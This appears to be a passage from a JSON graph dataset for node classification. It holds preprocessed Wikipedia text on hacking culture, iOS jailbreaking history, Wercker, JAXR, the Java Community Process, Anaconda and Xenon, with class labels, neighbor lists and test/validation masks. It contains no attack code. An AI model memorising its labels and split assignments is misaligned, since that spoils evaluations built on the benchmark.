main groups intelligence agencies cyberwarfare operatives nation states groups hackers carry organized criminal activities profit typical approach attack internet-connected system order several recurring tools trade techniques used computer criminals security experts security exploit prepared application takes advantage known weakness common examples security exploits sql injection cross-site scripting cross-site request forgery abuse security holes may result substandard programming practice exploits would able used file transfer protocol ftp hypertext transfer protocol http php ssh telnet web pages common web site web domain hacking tools procedures computer underground produced specialized slang 1337speak members often advocate freedom information strongly opposing principles copyright well rights free speech privacy writing software performing activities support views referred hacktivism consider illegal cracking ethically justified goals common form website defacement computer underground frequently compared wild west common hackers use aliases conceal identities computer underground supported regular real-world gatherings called hacker conventions hacker cons events include summercon summer def con hohocon christmas shmoocon february blackhat chaos communication congress athcon hacker halted hope local hackfest groups organize compete develop skills send team prominent convention compete group pentesting exploit forensics larger scale hacker groups became popular early 1980s providing access hacking information resources place learn members computer bulletin board systems bbss utopias provided platforms information-sharing via dial-up modem hackers could also gain credibility affiliated elite groups maximum imprisonment one year fine fourth category commonly known computer fraud abuse act prohibits unauthorized access damage protected computers protected computers defined maximum imprisonment fine violations computer fraud abuse act depends severity violation offender history violations act notable hacker-oriented print publications phrack hakin9 information contained hacker magazines ezines often outdated time published enhanced contributors reputations documenting successes hackers often show interest fictional cyberpunk cyberculture literature movies adoption fictional pseudonyms symbols values metaphors works common",
    "neighbors": [
      9217,
      11266,
      1540,
      5636,
      10756,
      11,
      2067,
      4117,
      3094,
      9240,
      7710,
      9248,
      3619,
      2084,
      7717,
      4140,
      3629,
      8753,
      10295,
      6712,
      7739,
      7228,
      10300,
      1087,
      9791,
      4163,
      2634,
      4689,
      8274,
      2643,
      8787,
      11347,
      7257,
      8288,
      6754,
      8803,
      3172,
      10341,
      4198,
      11368,
      107,
      6254,
      1139,
      2164,
      1143,
      119,
      8824,
      2683,
      3709,
      5245,
      3711,
      5246,
      8320,
      8321,
      5251,
      9862,
      138,
      9356,
      150,
      10903,
      10392,
      8867,
      5284,
      2213,
      7855,
      688,
      7856,
      179,
      180,
      2739,
      6326,
      4797,
      2750,
      3262,
      7364,
      7368,
      7887,
      9423,
      9424,
      10959,
      8403,
      2261,
      9433,
      3290,
      733,
      4830,
      7901,
      8415,
      9440,
      9950,
      2275,
      11486,
      5349,
      1254,
      743,
      6373,
      4843,
      5363,
      7926,
      7927,
      5373,
      7426,
      3843,
      6916,
      7437,
      8974,
      9486,
      11537,
      3858,
      4883,
      8978,
      790,
      3350,
      9214,
      7449,
      2330,
      3354,
      4892,
      5404,
      7965,
      6431,
      8998,
      3880,
      7465,
      7979,
      1331,
      1843,
      7990,
      311,
      11576,
      5433,
      826,
      11577,
      830,
      1346,
      1861,
      2887,
      4423,
      6473,
      4940,
      9548,
      8526,
      9550,
      4945,
      851,
      4435,
      8023,
      1882,
      7515,
      4956,
      9051,
      1886,
      1892,
      3941,
      11112,
      2409,
      2926,
      2931,
      3955,
      3956,
      5491,
      7031,
      1912,
      4986,
      7547,
      2430,
      8575,
      10110,
      899,
      7044,
      7556,
      5512,
      5516,
      6541,
      9102,
      3473,
      1429,
      4507,
      3996,
      415,
      2975,
      5540,
      8612,
      2470,
      3495,
      939,
      9646,
      1970,
      2484,
      7606,
      8632,
      441,
      1466,
      8635,
      6588,
      957,
      9145,
      959,
      10173,
      11197,
      3523,
      8644,
      3525,
      8135,
      9160,
      5579,
      2508,
      4559,
      4562,
      9688,
      3552,
      9184,
      9186,
      4579,
      3044,
      10727,
      11244,
      7150,
      1519,
      2033,
      1525,
      2041,
      4605,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4957,
    "label": 4,
    "text": "IOS_jailbreaking:ios jailbreaking ios jailbreaking privilege escalation apple device purpose removing software restrictions imposed apple ios tvos watchos operating systems typically done using series kernel patches jailbreaking permits root access ios allowing installation software unavailable official apple app store many types jailbreaking available different versions apple publicly disapproves jailbreaking apple implemented hardware software fixes vulnerabilities used jailbreaks meaning many versions ios jailbroken immediately analogous rooting android although software unavailable google play installed android without rooting one reasons jailbreaking expand feature set limited apple app store apple checks apps compliance ios developer program license agreement accepting distribution app store however reasons banning apps limited safety security may regarded arbitrary capricious one case apple mistakenly banned app pulitzer-winning cartoonist violated developer license agreement specifically bans apps contain content ridicules public figures access banned apps users rely jailbreaking circumvent apple censorship content features jailbreaking permits downloading programs approved apple user interface customization tweaks since software programs available apt installer.app legacy required adhere app store guidelines many typical self-contained apps instead extensions customization options ios apps commonly called tweaks users install programs purposes including personalization customization interface tweaks developed developers designers adding desired features fixing annoyances making development work device easier providing access filesystem command-line tools many chinese ios device owners also jailbreak phones install third-party chinese character input systems easier use apple jailbreaking also opens possibility using software unofficially unlock carrier-locked iphones used carriers software-based unlocks available since september 2007 tool applying specific iphone model baseband version multiple models versions includes iphone 4s iphone 4 iphone 3gs iphone 3g models example unlocking iphone jailbreak utility would redsn0w software iphone users able create custom ipsw unlock device moreover unlocking process options install cydia ipad baseband computer criminals may jailbreak iphone install malware target jailbroken iphones malware installed easily italian cybersecurity company hacking team sells hacking software law enforcement agencies advised police jailbreak iphones allow tracking software installed iphones installation consumer software generally restricted installation app store jailbreaking therefore allows installation pirated applications suggested major motivation apple prevent jailbreaking protect income app store including third-party developers allow buildup sustainable market third-party software however installation pirated applications also possible without jailbreaking taking advantage enterprise certificates facilitate distribution modified pirated releases popular applications jailbroken device booting loads apple kernel initially device exploited kernel patched every time turned many different types jailbreaks come years untethered jailbreak jailbreak require assistance reboots kernel patched without help computer application jailbreaks uncommon take significant amount reverse engineering create tethered jailbreak opposite untethered jailbreak sense computer required boot device boot using tethered jailbreak user still able restart/kill springboard without needing reboot mix untethered tethered jailbreak also option namely semi-tethered type jailbreak allows user reboot patched kernel non-jailbroken functions still run making phone call texting using app able patched kernel run modified code device must booted using computer type jailbreak become popular recent years semi-untethered variant type jailbreak like semi-tethered jailbreak device reboots longer patched kernel kernel patched without using computer kernel usually patched using application installed device recent jailbreaks semi-untethered variant jailbreaking ios devices sometimes compared rooting android devices although concepts involve privilege escalation differ scope android devices allow users modify replace operating system unlocking bootloader moreover nearly android phones option allow user install unknown 3rd-party apps exploit needed normal sideloading ios engineered security measures including locked bootloader prevent users modifying operating system prevent apps gaining root privileges jailbreaking ios device defeat security measures presents significant technical challenge violates apple end-user license agreement ios 2015 sideloading apps general difficult individual users requiring purchase developer membership corporations could install private applications onto corporate phones 2015 became free users however requires basic understanding xcode compiling ios apps apps installed way restrictions apps addition alternative app stores utilising enterprise certificates sprung offering modified pirated releases popular ios applications video games either previously released cydia unavailable app store due complying apple developer guidelines first iphone worm ikee appeared early november 2009 created 21-year-old australian student town wollongong told australian media created worm raise awareness security issues jailbreaking allows users install ssh service users leave default insecure state month f-secure reported new malicious worm compromising bank transactions jailbroken phones netherlands similarly affecting devices owner installed ssh without changing default password 2010 blogger john gruber close apple said users misunderstood jailbreak exploits serious appear commented odd press mostly covering 'jailbreaking convenient rather 'remote code exploit wild pointing exploit allowed creator malicious website take control iphones accessing restoring device itunes removes jailbreak however generally updates device latest possibly non-jailbreakable version due apple use shsh blobs many applications aim prevent restoring devices version currently running whilst removing jailbreaks examples succession semi-restore cydia eraser 2012 forbes staff analyzed ucsb study 1,407 free programs available apple third party source 1,407 free apps investigated 825 downloaded apple app store using website app tracker 526 bigboss cydia default repository 21 official apps tested leaked device id 4 leaked location unofficial apps leaked 4 0.2 respectively 0.2 apps cydia leaked photos browsing history app store leaked none unauthorized apps tended respect privacy better official ones also program available cydia called privacy allows user control upload usage statistics remote servers august 2015 keyraider malware discovered affects jailbroken iphones apple released various updates ios patch exploits used jailbreak utilities includes patch released ios 6.1.3 software exploits used original evasi0n ios 6–6.1.2 jailbreak ios 7.1 patching evasi0n 7 jailbreak ios 7–7.0.6-7.1 beta 3 bootroom exploits exploits found hardware device patched apple system updates fixed hardware revisions new chips new hardware entirety occurred iphone 3gs 2009 july 15 2011 apple released new ios version closed exploit used jailbreakme 3.0 german federal office information security reported jailbreakme uncovered critical weakness information could stolen malware unwillingly downloaded ios users clicking maliciously crafted pdf files apple released fix security hole jailbreak users access fix published developer jailbreakme january 27 2015 apple released ios 8.1.3 patched exploits used jailbreak ios 8.0-8.1.2 possible jailbreak ios 8.3 update ios 9.1 update october 21 2015 included patch pangu ios 9.0-9.0.2 jailbreak august 13 2015 apple updated ios 8.4.1 patching taig exploit pangu taig teams said working exploiting ios 8.4.1 pangu demonstrated chances wwdc 2015 september 16 2015 ios 9 announced made available released new rootless security system dubbed heavy blow jailbreaking community october 21 2015 seven days pangu ios 9.0-9.0.2 jailbreak release apple pushed ios 9.1 update contained patch rendered nonfunctional august 4 2016 apple released ios version 9.3.4 patch semi-untethered jailbreak 64-bit devices august 25 2016 apple released ios version 9.3.5 patch three important vulnerabilities used secret jailbreak pegasus malware nso group january 23 2017 apple released ios 10.2.1 patch jailbreak exploits released google yalu ios 10 jailbreak created luca todesco december 2 2017 ios 11.2 released included patch async_wake exploit ian beer google project zero may 29 2018 ios 11.4 released including patch 2 exploits empty_list multi_path ian beer google project zero january 22 2019 ios 12.1.3 released including patch exploit voucher_swap found independently brandon azad google project zero zhuo liang qihoo 360 nirvan team may 13 2019 ios 12.3 released including patch exploit sock_puppet ned williamson google project zero however 18th august 2019 bacame known apple accidentally reintroduced vulnerabilities ios 12.4 making possible jailbreak 12.4 exploits pre-12.3 versions apple n't patched 12.4.1 version yet legal status jailbreaking affected laws regarding circumvention digital locks laws protecting digital rights management drm mechanisms many countries laws countries laws including exceptions jailbreaking international treaties influenced development laws affecting jailbreaking 1996 world intellectual property organization wipo copyright treaty requires nations party treaties enact laws drm circumvention american implementation digital millennium copyright act dmca includes process establishing exemptions non-copyright-infringing purposes jailbreaking 2001 european copyright directive implemented treaty europe requiring member states european union implement legal protections technological protection measures copyright directive includes exceptions allow breaking measures non-copyright-infringing purposes jailbreaking run alternative software member states vary implementation directive apple technically support jailbreaking violation eula jailbreaking communities generally legally threatened apple least two prominent jailbreakers given positions apple albeit least one case temporary one apple also regularly though possibly somewhat jokingly thanked jailbreak communities detecting security holes ios release notes apple support article concerning jailbreaking claims may deny service iphone ipad ipod touch installed unauthorized software therefore anyone jailbroken warranty may may get support apple considering assistance jailbreaking 2010 electronic frontiers australia said unclear whether jailbreaking legal australia anti-circumvention laws may apply laws strengthened copyright amendment act 2006 november 2012 canada amended copyright act new provisions prohibiting tampering drm protection exceptions including software interoperability jailbreaking device run alternative software form circumventing digital locks purpose software interoperability several efforts 2008–2011 amend copyright act bill c-60 bill c-61 bill c-32 prohibit tampering digital locks along initial proposals c-11 restrictive bills set aside 2011 michael geist canadian copyright scholar cited iphone jailbreaking non-copyright-related activity overly-broad copyright act amendments could prohibit india copyright law permits circumventing drm non-copyright-infringing purposes parliament introduced bill including drm provision 2010 passed 2012 copyright amendment bill 2012 india signatory wipo copyright treaty requires laws drm circumvention listed us special 301 report priority watch list applied pressure develop stricter copyright laws line wipo treaty new zealand copyright law allows use technological protection measure tpm circumvention methods long use legal non-copyright-infringing purposes law added copyright act 1994 part copyright new technologies amendment act 2008 jailbreaking might legal singapore done provide interoperability circumvent copyright tested court law copyright related rights regulations 2003 makes circumventing drm protection measures legal purpose interoperability copyright infringement jailbreaking may form circumvention covered law tested court competition laws may also relevant main law affects legality ios jailbreaking united states 1998 digital millennium copyright act dmca says person shall circumvent technological measure effectively controls access work protected dmca since may apply jailbreaking every three years law allows public propose exemptions legitimate reasons circumvention last three years approved 2010 2012 u.s copyright office approved exemptions allowed smartphone users jailbreak devices legally 2015 copyright office approved expanded exemption also covers all-purpose mobile computing devices tablets still possible apple may employ technical countermeasures prevent jailbreaking prevent jailbroken phones functioning unclear whether legal traffic tools used make jailbreaking easy 2010 apple announced jailbreaking violate warranty may affected magnuson-moss warranty act 1975 2007 tim wu professor columbia law school argued jailbreaking apple superphone legal ethical plain fun wu cited explicit exemption issued library congress 2006 personal carrier unlocking notes locks used wireless carriers limit ability subscribers switch carriers business decision nothing whatsoever interests protected copyright thus implicate dmca wu claim exemption applies help others unlock device traffic software 2010 response request electronic frontier foundation u.s copyright office explicitly recognized exemption dmca permit jailbreaking order allow iphone owners use phones applications available apple store unlock iphones use unapproved carriers apple previously filed comments opposing exemption indicated considered jailbreaking violation copyright implication prosecutable dmca apple request define copyright law include jailbreaking violation denied part 2009 dmca rulemaking ruling library congress affirmed july 26 2010 jailbreaking exempt dmca rules respect circumventing digital locks dmca exemptions must reviewed renewed every three years else expire october 28 2012 us copyright office released new exemption ruling jailbreaking smartphones continued legal circumvention accomplished sole purpose enabling interoperability lawfully obtained software applications computer programs telephone handset however u.s copyright office refused extend exemption tablets ipads arguing term tablets broad ill-defined exemption class devices could unintended side effects copyright office also renewed 2010 exemption unofficially unlocking phones use unapproved carriers restricted exemption phones purchased january 26 2013 days original iphone became available july 2007 developers released first jailbreaking tool soon jailbreak-only game app became available october 2007 jailbreakme 1.0 also called appsnapp allowed people jailbreak iphone os 1.1.1 iphone ipod touch included installer.app way get software jailbroken device february 2008 zibri released ziphone tool jailbreaking iphone os 1.1.3 iphone os 1.1.4 iphone dev team affiliated apple released series free desktop-based jailbreaking tools july 2008 released version pwnagetool jailbreak new iphone 3g iphone os 2.0 well ipod touch newly including cydia primary third-party installer jailbroken software pwnagetool continues updated untethered jailbreaks newer ios versions november 2008 iphone dev team released quickpwn jailbreak iphone os 2.2 iphone ipod touch options enable past functionality apple disabled certain devices apple released ios 3.0 june 2009 dev team published redsn0w simple jailbreaking tool mac windows also updated pwnagetool primarily intended expert users making custom firmware mac continues maintain redsn0w jailbreaking versions ios 4 ios 5 devices george hotz developed first iphone unlock 2009 released jailbreaking tool iphone 3gs iphone os 3.0 called purplera1n blackra1n iphone os version 3.1.2 3rd generation ipod touch devices october 2010 released limera1n low-level boot rom exploit permanently works jailbreak iphone 4 used part tools including redsn0w nicholas allegra better known comex released program called spirit may 2010 spirit jailbreaks devices including iphones running iphone os 3.1.2 3.1.3 ipad running ios 3.2 august 2010 comex released jailbreakme 2.0 first web-based tool jailbreak iphone 4 ios 4.0.1 july 2011 released jailbreakme 3.0 web-based tool jailbreaking devices certain versions ios 4.3 including ipad 2 first time ios 4.3.3 2011 jailbreakme 3.0 used flaw pdf file rendering mobile safari chronic dev team initially released greenpois0n october 2010 desktop-based tool jailbreaking ios 4.1 later ios 4.2.1 devices including apple tv well ios 4.2.6 cdma verizon iphones december 2011 redsn0w included corona untether pod2g ios 5.0.1 iphone 3gs iphone 4 ipad 1st generation ipod touch 3rd 4th generation june 2012 redsn0w also includes rocky racoon untether pod2g ios 5.1.1 iphone ipad ipod touch models support ios 5.1.1 iphone dev team chronic dev team pod2g collaborated release absinthe january 2012 desktop-based tool jailbreak iphone 4s first time ipad 2 second time ios 5.0.1 devices also ios 5.0 iphone 4s may 2012 released absinthe 2.0 jailbreak ios 5.1.1 untethered iphone ipad ipod touch models support ios 5.1.1 including jailbreaking third-generation ipad first time hackers together called evad3rs released ios 6.x jailbreak tool called evasi0n available linux os x windows monday february 4 2013 noon eastern standard time due high volume interest downloading jailbreak utility site initially gave anticipating users download errors apple upgraded software ios 6.1.3 permanently patched evasi0n jailbreak april 2013 latest versions sn0wbreeze released added support tethered jailbreaking a4 devices i.e devices newer iphone 4 ipad 1st generation ipod touch 4th generation december 22 2013 evad3rs released new version evasi0n supports jailbreaking ios 7.0.x known evasi0n7 december 30 2013 winocm ih8sn0w squiffypwn released p0sixspwn untethering devices ios 6.1.3 – 6.1.5 initially necessary jailbreak tethered using redsn0w install p0sixpwn cydia days later january 4 2014 team released version p0sixpwn jailbreaking using computer ios 7.1 patched exploits used evasi0n7 june 23 2014 pangu chinese untethered jailbreak released ios 7.1 october 22 2014 pangu team released pangu8 jailbreak devices running ios 8-8.1 first versions bundle cydia ios 8 compatible version cydia time november 29 2014 taig team released jailbreak tool called taig devices running ios 8.0-8.1.1 december 10 2014 app updated include support ios 8.1.2 july 3 2015 taig 2.3.0 released includes support ios 8.0-8.4 10 september 2015 6 days ios 9 released ih8sn0w demonstrated working exploit twitter page linking youtube video october 14 2015 pangu team released pangu 9 jailbreak tool ios 9.0 9.0.2 march 11 2016 pangu team updated tool support ios 9.1 64-bit devices july 17 2016 pangu team released pangu93 semi-untethered jailbreak tool ios 9.2-9.3.3 first semi-untethered jailbreak time made within sideloaded app included support 64bit devices mid-march 2017 jk9357 aka realkjcmember part kjc kim jong cracks hacking team released first semi-untethered jailbreak 32bit devices 9.1-9.3.4 jailbreak made use pegasus vulnerabilities december 21 2016 well-known hacker luca todesco released beta semi-untethered jailbreak tool ios 10.1 known yalu+mach_portal select 64-bit ios devices jailbreak made use ian beer google project zero mach_portal exploit version extremely unstable meant developers january 26 2017 help marco grassi stable version ios 10.2 released eventually supporting 64-bit ios devices except iphone 7 7 plus supported older unstable version 10.1.1 jailbreak made use ian beer project zero extra_recipe exploit jailbreaks installed computer application known cydia impactor allows signing apps app store todesco said newer version would eventually updated support iphone 7 7 plus ios 10.1.1 however left jailbreaking scene march 28 abandoning jailbreaks released august 6 2017 siguza tihmstar released semi-untethered phoenix jailbreak 32-bit devices ios 9.3.5 september 19 2017 tihmstar released etasonjb jailbreak 32-bit devices ios 8.4.1 exploit found users 9.3.5 phoenix jailbreak could downgrade 8.4.1 without use shsh blobs 8.4.1 unsigned version ios october 15 2017 hacker abraham masri known twitter cheesecakeufo released saïgon jailbreak 64-bit devices ios 10.2.1 december 6 2017 abraham masri released houdini first semi-jailbreak ios 10 compatible ios 10.x 10.3.2 64-bit devices application allows installation themes resolution changes etc basic cydia repos untethered needs run exploit install content tool updated beta revision 1 adding compatibility ios 11 11.1.2 december 11 2017 ian beer released async_wake ios 11.0 11.1.2 exploit allows tfp0 exploit updated allowed jailbreak apps jailed devices filzajailed filzaescaped allows root access jailed device mterminal-jailed applebetas allows execution commands jailed device torngat 1gamerdev tweak manager set boot logo change resolution disable ota updates jailed device december 23 2017 abraham masri released to.panga ios 11 11.1.2 wip jailbreak developers based async_wake exploit ian beer cydia included since jailbreak used kppless exploit cydia substrate rewritten abraham masri since stated project would n't updated due tools goal december 24 2017 tihmstar released h3lix semi-untethered jailbreak 32-bit devices compatible ios 10 versions shortly release h3lix tihmstar siguza released doubleh3lix semi-untethered jailbreak 64bit devices excluding iphone 7 ios 10.x december 26 2017 hacker jonathan levin known twitter morpheus____ released liberios wip developer-only jailbreak based async_wake exploit ian beer ios 11.0 ios 11.1.2 jonathan levin later stated liberios would officially released cydia january 29 2018 zimperium whose goal assess issues locate possible ios sandbox escape released two crucial bugs one major vulnerability leads execution arbitrary code different crucial daemons found ios 11.2 11.2.2 second bug full relative aslr bypass control stack corebluetooth leads memory corruption also 11.2 – 11.2.2 february 26 2018 developer coolstar known twitter coolstarorg released public version electra jailbreak ios devices 11.0–11.1.2 jailbreak uses kppless exploit cydia substrate updated ios 11 electra uses substrate alternative known substitute june 6 2018 abraham masri released update houdini first semi-jailbreak tool updated beta 3 revision 1 adding compatibility ios 11 11.3.1 july 6 2018 developer coolstar known twitter coolstarorg released public version electra jailbreak ios devices 11.0-11.3.1 jailbreak uses kppless exploit cydia substrate updated ios 11 electra uses substrate alternative known substitute august 17 2018 developer ben sparkes released public version meridian jailbreak ios versions 10.x 64-bit devices september 3 2018 web-based jailbreak called totally spyware released unknown user named jakeblair420 eventually came developed foxletfox ben sparkes littlelailo siguza stek29 based works 5aelo ian beer niklas b jamie bishop lucas todesco realkjcmember sam bingner sticktron theninjaprawn tihmstar xerub used webkit-based exploit bootstrap either meridian doubleh3lix october 14 2018 former electra team member developer pwn20wnd known twitter pwn20wnd ref name= https //twitter.com/pwn20wnd https //twitter.com/pwn20wnd /ref released public version unc0ver jailbreak ios devices 11.0–11.4.1 jailbreak uses three kppless exploits provided ian beer ios 11 async_wake empty_list multi_path pwn20wnd also worked jay freeman original developer cydia get cydia substrate reupdated ios 11 released december 17 2018 february 22 2019 developer pwn20wnd released public update unc0ver jailbreak ios devices 12.0–12.1.2 version unc0ver uses exploits provided tihmstar sorrymybad ios 12 v1ntex v3ntex voucher_swap pwn20wnd worked jay freeman get cydia cydia substrate updated work ios 12 april 29 2019 electra team released chimera public jailbreak ios 12.0-12.1.2 included support devices including devices a12 chips major security reinforcements compared devices jailbreak uses substitute alternative cydia substrate allow tweaks run june 12 2019 developer pwn20wnd released public update unc0ver jailbreak add support ios 12.1.2-12.2 jailbreak support a8 a7 devices begin support devices added ios 12.1.2-12.2 18th august 2019 developer pwn20wnd released public update unc0ver jailbreak add support ios 12.4 added following mistake apple reintroduced vulnerabilities patched 12.3 version unc0ver used sock_puppet exploit developed ned williamson sock_port exploit developed jake james a12 devices yet supported unc0ver due incompatibility substrate lack pac bypass beyond 12.1.2",
    "neighbors": [
      10755,
      516,
      5636,
      6,
      5637,
      9732,
      5647,
      7697,
      3602,
      5138,
      11289,
      4649,
      3626,
      4139,
      6186,
      2605,
      6700,
      1074,
      8754,
      9784,
      1083,
      8253,
      5191,
      8783,
      4180,
      10838,
      1623,
      3672,
      3162,
      3681,
      9826,
      10341,
      8806,
      3691,
      6763,
      2673,
      8313,
      7292,
      2686,
      6783,
      10878,
      4737,
      11391,
      8326,
      9356,
      9366,
      5784,
      1177,
      154,
      10393,
      3228,
      6301,
      2207,
      161,
      11430,
      10921,
      2735,
      3248,
      4787,
      2228,
      4283,
      700,
      3772,
      7869,
      6345,
      2259,
      3286,
      8918,
      9430,
      3293,
      4318,
      6884,
      9451,
      1772,
      5363,
      5875,
      2811,
      1276,
      7420,
      1290,
      3338,
      784,
      10512,
      1813,
      4888,
      5912,
      6938,
      8476,
      5927,
      10023,
      9518,
      4399,
      10036,
      7991,
      2363,
      2365,
      2366,
      9022,
      11584,
      9537,
      1346,
      10562,
      7492,
      7496,
      8014,
      7515,
      2397,
      6495,
      4964,
      9063,
      10600,
      3948,
      10608,
      7541,
      5500,
      11137,
      4995,
      2439,
      6023,
      6537,
      6539,
      7052,
      3473,
      3483,
      10141,
      5024,
      2467,
      2979,
      428,
      8109,
      8627,
      2492,
      446,
      7614,
      8641,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      477,
      7133,
      9182,
      8675,
      4068,
      487,
      2023,
      8167,
      7154,
      1524,
      6646,
      2041,
      7678,
      4607
    ],
    "mask": "None"
  },
  {
    "node_id": 4958,
    "label": 7,
    "text": "Wercker:wercker wercker docker-based continuous delivery platform helps software developers build deploy applications microservices using command-line interface developers create docker containers desktop automate build deploy processes testing desktop deploy various cloud platforms ranging heroku aws rackspace command-line interface wercker open-sourced business behind wercker also called wercker founded 2012 acquired oracle corporation 2017 wercker targets companies developers focus web applications acts middleman source-code hosting repositories like github cloud servers like amazon web services time developer makes change codebase git wercker retrieves code builds version inside container isolate tests errors notifies user either passed failed wercker integrated docker containers package application code easily moved server server build artifact docker container user take container docker hub private registry build code shipping saas platform enables developers test deploy code often push software updates incrementally ready rather bundled dumps makes easier coders practice continuous integration software engineering practice change developer makes codebase constantly tested process software ’ break goes live wercker based concept pipelines automated workflows pipelines take pieces code automatically execute series steps upon code wercker api provides programmatic access information applications builds deploys code snippets available golang node.js python service includes social networking element providing facebook-like wall team members know colleagues creates high degree transparency needed ever numerous groups work across different countries projects wercker currently available cloud services though wercker working enterprise offering allow on-premises use well hernandez van leuffen came wercker ’ underlying technology thesis project containers automatic resource provisioning university san francisco nexuslabs foundation based amsterdam mit helped wercker attract venture capital united states january 2013 wercker received seed investment a-list group investors round led shamrock ventures additional support greylock venture partners amsterdam-based micro vc vitulum ventures company executives reveal amount funding received wercker allegedly raised close 1 million wercker part 2012 startup incubator program rockstart accelerator amsterdam participated mozilla webfwd program salesforce innovation challenge also gigaom structure europe launchpad competition receiving people ’ choice judge ’ awards startup brought former co-founder openstack andy smith cto september 2014 month later wercker brought 2.4 million bringing total funding 3.2 million notion capital drove investment round along tola capital vitulum ventures shamrock ventures rockstart accelerator wercker originally focused lxc containers converted platform run ever popular docker containers late 2014 launched local development model enabling developers build deploy containerized applications entrepreneur included wercker among 9 essential tools agile product development teams july 2015 december atlassian launched wercker integration git-based bitbucket service called wercker yaml viewer january 2016 wercker announced 4.5 million series investment round led inkef capital participation notion capital bringing company ’ total funding 7.5 million first time inkef capital one largest vc funds netherlands invested developer tool wercker announced would use investment drive developer adoption expand enterprise market deepen automation capabilities flexible complex development pipelines april 17 2017 oracle announced signed definitive agreement acquire wercker",
    "neighbors": [
      4194,
      295,
      8554,
      3819,
      4236,
      8495,
      7248,
      467,
      11221,
      11097,
      1435,
      2910
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4959,
    "label": 9,
    "text": "Java_API_for_XML_Registries:java api xml registries java api xml registries jaxr defines standard api java platform applications access programmatically interact various kinds metadata registries jaxr one java xml programming apis jaxr api developed java community process jsr 93 jaxr provides uniform standard java api accessing different kinds xml-based metadata registry current implementations jaxr support ebxml registry version 2.0 uddi version 2.0 registries could defined future jaxr provides api clients interact xml registries service provider interface spi registry providers plug registry implementations jaxr api insulates application code underlying registry mechanism writing jaxr based client browse populate registry code change registry changes instance uddi ebxml",
    "neighbors": [
      9988,
      8203,
      3341,
      10526,
      10020,
      6067,
      6328,
      2106,
      3517,
      6334,
      3518,
      3008,
      11582,
      1095,
      3278,
      3920,
      4960,
      3558,
      1128,
      3560,
      9834,
      3954
    ],
    "mask": "Test"
  },
  {
    "node_id": 4960,
    "label": 9,
    "text": "Java_Community_Process:java community process java community process jcp established 1998 formalized mechanism allows interested parties develop standard technical specifications java technology anyone become jcp member filling form available jcp website jcp membership organizations commercial entities requires annual fees – free individuals jcp involves use java specification requests jsrs – formal documents describe proposed specifications technologies adding java platform formal public reviews jsrs take place jsr becomes final jcp executive committee votes final jsr provides reference implementation free implementation technology source code form technology compatibility kit verify api specification jsr describes jcp jsr 215 describes current version 2.7 jcp hundreds jsrs visible jsrs include jcp executive board characterized rubber stamp organization since oracle acquired sun microsystems original developer java language apache software foundation resigned seat board december 2010 oracle unwilling license technology compatibility kit apache version java source",
    "neighbors": [
      514,
      9731,
      7176,
      8201,
      6168,
      10266,
      11296,
      10789,
      5677,
      10798,
      2106,
      572,
      7750,
      4688,
      597,
      10327,
      2658,
      11363,
      1128,
      7784,
      5233,
      9333,
      6775,
      631,
      3705,
      8825,
      3710,
      9343,
      3712,
      9350,
      4235,
      2710,
      2215,
      1707,
      3247,
      8880,
      690,
      5810,
      6322,
      8882,
      6334,
      6338,
      10436,
      5323,
      6860,
      3278,
      3285,
      1756,
      220,
      1250,
      9955,
      9455,
      5872,
      3328,
      9988,
      8965,
      4358,
      3341,
      1809,
      8981,
      6427,
      6428,
      10526,
      8994,
      7971,
      10020,
      9011,
      1332,
      2871,
      5943,
      7485,
      11582,
      8007,
      2895,
      3920,
      1363,
      5460,
      3416,
      4959,
      5471,
      5987,
      11626,
      7022,
      3954,
      9078,
      11129,
      380,
      3966,
      5509,
      8070,
      910,
      11670,
      6039,
      7072,
      5031,
      8108,
      6067,
      6074,
      10683,
      10684,
      3517,
      3518,
      3519,
      3008,
      5567,
      6589,
      7104,
      9665,
      10187,
      10193,
      11219,
      10200,
      9178,
      8158,
      992,
      993,
      3558,
      3560,
      3561,
      3562,
      7146,
      7148,
      8179,
      2038,
      3577,
      5627,
      6142,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 4961,
    "label": 2,
    "text": "Anaconda_(installer):anaconda installer anaconda free open-source system installer linux distributions anaconda used red hat enterprise linux oracle linux scientific linux centos qubes os fedora sabayon linux blag linux gnu also less known discontinued distros like progeny componentized linux based debian founded ian murdock asianux foresight linux rpath linux vidalinux based gentoo anaconda offers text-mode gui mode users install wide range systems designed easily portable supports wide range hardware platforms ia-32 itanium dec alpha ibm esa/390 powerpc armv8 supports installing local storage devices like cd-rom drives harddisks well network resources via ftp http nfs installations automated use kickstart file automatically configures installation allowing users run minimal supervision starting os installation process installer checks system hardware resource requirements requirements satisfied start installation process mainly written python modules written c. graphical frontend based gtk+ 3/pygobject designed glade interface designer anaconda also custom text frontend support computers line printer like terminals ibm esa/390 mainframes",
    "neighbors": [
      5380,
      9353,
      1553,
      5523,
      2974,
      7983,
      823,
      59,
      10172,
      7364,
      3142,
      4302,
      10961,
      4309,
      8539,
      5723,
      5988,
      5096,
      4841,
      8554,
      9197,
      9455,
      4729,
      11643,
      8700,
      2045,
      3582,
      11135
    ],
    "mask": "Test"
  },
  {
    "node_id": 4962,
    "label": 8,
    "text": "Xenon_(program):xenon program xenon software perform covert internet searches surveillance presently use taxing authorities least six nations investigate possibilities tax evasion various revenue producing web sites online shops gambling sites pornography sites clients selling goods on-line auction sites software uses time-controlled web spiders avoid detection likely countermeasures webmasters targeted site use may legal citizen right privacy civil liberties implicated use xenon begun netherlands 2004 dutch tax authority belastingdienst amsterdam-based data mining firm sentient machine research together tax authorities austria canada denmark united kingdom since upgraded system sweden tax authority began using xenon 2007 swedish privacy advocate expert par strom stating 2007 anticipated use xenon swedish tax authority skatteverket would legal also stated use would pose dangers citizen privacy rights—as current use time similar spidering software developed internally swedish government canadian internet law expert michael geist expressed similar privacy concerns",
    "neighbors": [
      113,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 4963,
    "label": 5,
